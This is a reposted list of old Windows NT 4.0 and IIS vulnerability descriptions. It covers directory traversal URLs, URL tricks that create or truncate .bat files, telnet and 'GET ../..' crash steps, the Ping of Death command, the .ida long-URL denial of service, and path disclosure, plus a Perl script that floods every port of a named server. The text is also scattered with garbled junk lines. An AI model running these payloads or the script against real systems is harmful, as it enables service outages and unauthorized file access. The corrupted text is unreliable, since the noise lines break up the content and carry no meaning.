NT的漏洞及描述(英文）

受影響系統(tǒng):4.0,iis 1.0
A URL such as 'http://www.domain.com/..\..' allows you to browse and download files outside of the webserver content root directory.
0 y* o$ V* O3 E9 |8 b& D2 r
A URL such as 'http://www.domain.com/scripts..\..\scriptname' allows you to execute the target script.

By default user 'Guest' or IUSR_WWW has read access to all files on an NT disk. These files can be browsed, executed or downloaded by wandering guests.
& K9 O7 |0 A1 N2 q
5 C& E6 X% f" \--------------------------------------------------------------------
# K* Y, Q: z" F$ G4 C1 w8 s" ]6 y  t
9 F$ _8 x2 a" X. T) F受影響系統(tǒng):4.0
A URL such as http://www.domain.com/scripts/exploit.bat>PATH\target.bat will create a file 'target.bat''.

If the file 'target.bat' exists, the file will be truncated.
0 Y( D/ p( V& ?: Q. }6 P# r

6 v' {5 v! ~1 w: K2 z9 @. KA URL such as http://www.domain.com/scripts/script_name%0A%0D>PATH\target.bat will create an output file 'target.bat''.

, A! |. d; i8 O  V4 E----------------------------------------------------------------------

受影響系統(tǒng):3.51,4.0
; \! Q% E: y' R5 u* e6 w9 Y# DMultiple service ports (53, 135, 1031) are vunerable to 'confusion'.
( Z+ e) M, K7 q" Q! V
: z; H9 g7 O/ B7 YThe following steps;

  @4 l0 \* }' E$ d$ YTelnet to an NT 4.0 system on port 135
( ]; t; T' D0 @! {Type about 10 characters followed by a <CR>
Exit Telnet
results in a target host CPU utilization of 100%, though at a lower priority than the desktop shell. Multiple services which are confused can result in a locked system.
  r' a& p/ ~' o* h
4 k+ i; |$ [. T! ?' N* OWhen launched against port 135, NT Task manager on the target host shows RPCSS.EXE using more than usual process time. To clear this the system must be rebooted.
# I( k/ C7 o2 f+ j' j' l- ^, k
The above also works on port 1031 (inetinfo.exe) where IIS services must be restarted.

If a DNS server is running on the system, this attack against port 53 (dns.exe) will cause DNS to stop functioning.

" U/ ?; m6 X$ sThe following is modified perl script gleaned from postings in the NTsecurity@iss.net list to test ports on your system (Perl is available from the NT resource kit):

+ x5 i# y! g% ~* w3 v/*begin poke code*/
% U, O3 R& Y, Q5 C7 H; S8 O  T
use Socket;
' E8 B" u: f. E+ Muse FileHandle;
require "chat2.pl";

) t1 j0 [  f3 {2 v/ _$systemname = $ARGV[0] && shift;
2 K% @- m4 M$ J
# S6 ?- s8 k! p9 f% N$verbose = 1; # tell me what you're hitting
$knownports = 1; # don't hit known problem ports
4 d9 M6 {; M" L* \for ($port = $0; $port<65535; $port++)
{


if ($knownports && ($port == 53 || $port == 135 || $port== 1031)) {
, f2 N% }! Y% Onext;
+ B" F2 x* O/ J: f}
" a% X# A& N! E. C* l$fh = chat::open_port($systemname, $port);
2 \+ y- E$ L3 w: \" p$ p7 Xchat::print ($fh,"This is about ten characters or more");
/ C0 p  k* u, r( O2 @if ($verbose) {
# n$ J! e- A2 p  e* Z- _print "Trying port: $port\n";
) ^0 N6 U% e- q# d) I  L}
( E" Q% r2 Z5 Fchat::close($fh);
4 ?/ T3 C( i$ C# \/ o8 Q0 Z; U( t
}


/*end poke code*/
" ~/ m7 Q1 A7 ^9 j
Save the above text as c:\perl\bin\poke, run like this: C:\perl\bin> perl poke servername
3 a! t; R! p' I$ Z
" G% N! `: M9 U6 ?. K--------------------------------------------------------------------------------
8 F8 P% B4 {( q; T
受影響系統(tǒng):4.0
% j. b9 R5 z  a8 E8 k1 aUsing a telnet application to get to a webserver via HTTP port 80, and typing "GET ../.." <cr> will crash IIS.

4 o3 x% U7 k7 GThis attack causes Dr. Watson to display an alert window and to log an error:
; `/ a4 Q6 ^, s8 o2 I
"The application, exe\inetinfo.dbg, generated an application error The error occurred on date@ time The exception generated was c0000005 at address 53984655 (TCP_AUTHENT::TCP_AUTHENT"

--------------------------------------------------------------------------------
0 b% z5 m3 d6 Y) T
受影響系統(tǒng):3.51,4.0
3 R8 [7 u, d; o. a5 pLarge packet pings (PING -l 65527 -s 1 hostname) otherwise known as 'Ping of Death' can cause a blue screen of death on 3.51 systems:
  [6 f* c+ H+ ]! i8 o
  }+ E9 H/ x3 k  rSTOP: 0X0000001E
- ~, X! x/ \6 {! Z" t. nKMODE_EXCEPTION_NOT_HANDLED - TCPIP.SYS

-OR-
( G* u; w! W+ T. c6 Y& B! H& l# v
/ J1 W# ~3 H, g6 {! @STOP: 0x0000000A
  t3 R# S: c' r% @1 l. I3 XIRQL_NOT_LESS_OR_EQUAL - TCPIP.SYS
* w* E# \( n$ Y9 T' ]
NT 4.0 is vunerable sending large packets, but does not crash on receiving large packets.
5 r7 c; ^2 R7 N1 z3 W9 H  T, l: B
2 p' f# D9 y/ ^7 P5 Y--------------------------------------------------------------------------------
) ]/ \! G6 `4 ?" V& T: t8 K) ?) x
Microsoft IIS 5.0 has problems handling a specific form of URL ending with "ida". The problem can have 2 kinds of results. One possible outcome is that the server responds with a message like "URL String too long"; "Cannot find the specified path" or the like. The other possible result is that the server terminates with an "Access Violation" message (effectively causing a Denial of Service attack against the server). Vulnerable are all IIS versions (up to and including IIS 5.0). When a remote attacker issues a URL request with the malformed URL: http://www.example.com/...[25kb of '.']...ida The server will either crash (causing an effective DoS attack) or report its current directory location (revealing the directory structure).
$ J7 A3 I- x! }5 l+ L6 Q) L0 ~& }
5 h' n' v3 B9 v$ Q* Z--------------------------------------------------------
8 A! ]3 ?: i; g
9 R/ c5 }* u" zIIS, Microsoft's Internet Information Server, can be used to reveal the true path of the files (where they physically reside on the local hard drive), by requesting a non-existing file with an IDQ/IDA extension. By requesting a URL such as: http://www.microsoft.com/anything.ida Or: http://www.microsoft.com/anything.idq A remote user will get a response that looks like: 'The IDQ d:\http\anything.idq could not be found' Such a response allows him to gain further knowledge on how the web site is organized and the directory structure of the server